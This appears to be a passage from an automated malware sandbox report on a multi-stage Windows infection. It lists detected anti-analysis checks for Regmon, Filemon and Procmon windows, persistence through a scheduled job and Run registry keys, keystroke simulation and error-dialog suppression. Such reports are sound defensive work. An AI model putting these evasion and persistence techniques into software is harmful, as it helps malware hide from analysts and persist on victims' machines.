Source: C:\Users\user\1000015002\b74664dd7e.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\1000015002\b74664dd7e.exe Window searched: window name: FilemonClass
Source: C:\Users\user\1000015002\b74664dd7e.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\1000015002\b74664dd7e.exe Window searched: window name: RegmonClass
Source: C:\Users\user\1000015002\b74664dd7e.exe Window searched: window name: FilemonClass
Source: C:\Users\user\1000015002\b74664dd7e.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\1000015002\b74664dd7e.exe Window searched: window name: Regmonclass
Source: C:\Users\user\1000015002\b74664dd7e.exe Window searched: window name: Filemonclass
Source: C:\Users\user\1000015002\b74664dd7e.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
Creates job files (autostart)
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 3ec4738210.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 3ec4738210.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run b74664dd7e.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run b74664dd7e.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run splwow64.exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run splwow64.exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4d72d15151.exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4d72d15151.exe
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E0F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 17_2_00E0F98E
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E81C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 17_2_00E81C41
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
